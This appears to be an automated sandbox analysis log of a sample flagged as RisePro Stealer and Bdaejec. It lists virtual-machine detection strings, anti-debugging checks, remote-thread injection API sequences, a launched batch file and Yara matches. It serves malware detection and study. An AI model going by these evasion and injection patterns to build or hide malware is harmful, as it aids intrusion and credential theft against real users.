Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: xVBoxService.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459557759.0000000001FFC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\|
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!E
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_1AEAD613
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VBoxService.exe
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*QH
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VMWare
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

API call chain: ExitProcess graph end node

graph_1-1029

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01092014

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

0_2_00FCA100

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01ADA044 mov eax, dword ptr fs:[00000030h]	0_2_01ADA044
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FC4AB0 mov eax, dword ptr fs:[00000030h]	0_2_00FC4AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0109A044 mov eax, dword ptr fs:[00000030h]	7_2_0109A044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_00584AB0 mov eax, dword ptr fs:[00000030h]	7_2_00584AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0109A044 mov eax, dword ptr fs:[00000030h]	8_2_0109A044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00584AB0 mov eax, dword ptr fs:[00000030h]	8_2_00584AB0

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_00FBA400 GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree,

0_2_00FBA400

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01092014
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0108DADD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00652014
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0064DADD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00652014
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0064DADD

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,	0_2_00FCA100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 7_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,	7_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,	8_2_0058A100

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,	0_2_010AD930
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: EnumSystemLocalesW,	0_2_010A49BA
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: EnumSystemLocalesW,	0_2_010AD9D7
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_010AE0A0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_010ADB48
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: EnumSystemLocalesW,	0_2_010ADA22
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: EnumSystemLocalesW,	0_2_010ADABD
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,	0_2_010ADD9B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoA,	0_2_01898D69
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_010AD72B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,	0_2_010A4F3D
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,	0_2_010ADFCA
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_010ADEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_0066E0A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	7_2_0066D930
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	7_2_0066D9D7
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	7_2_006649BA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	7_2_0066DA22
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	7_2_0066DABD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_0066DB48
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	7_2_0066DD9B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_0066DEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_0066D72B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	7_2_00664F3D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	7_2_0066DFCA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_0066E0A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	8_2_0066D930
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	8_2_0066D9D7
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	8_2_006649BA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	8_2_0066DA22
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: EnumSystemLocalesW,	8_2_0066DABD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_0066DB48
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	8_2_0066DD9B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_0066DEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	8_2_0066D72B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	8_2_00664F3D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: GetLocaleInfoW,	8_2_0066DFCA

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_0108CCDC GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_0108CCDC

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_7ECA1E80 GetUserNameA,

0_2_7ECA1E80

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Code function: 1_2_00E6139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00E6139F

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
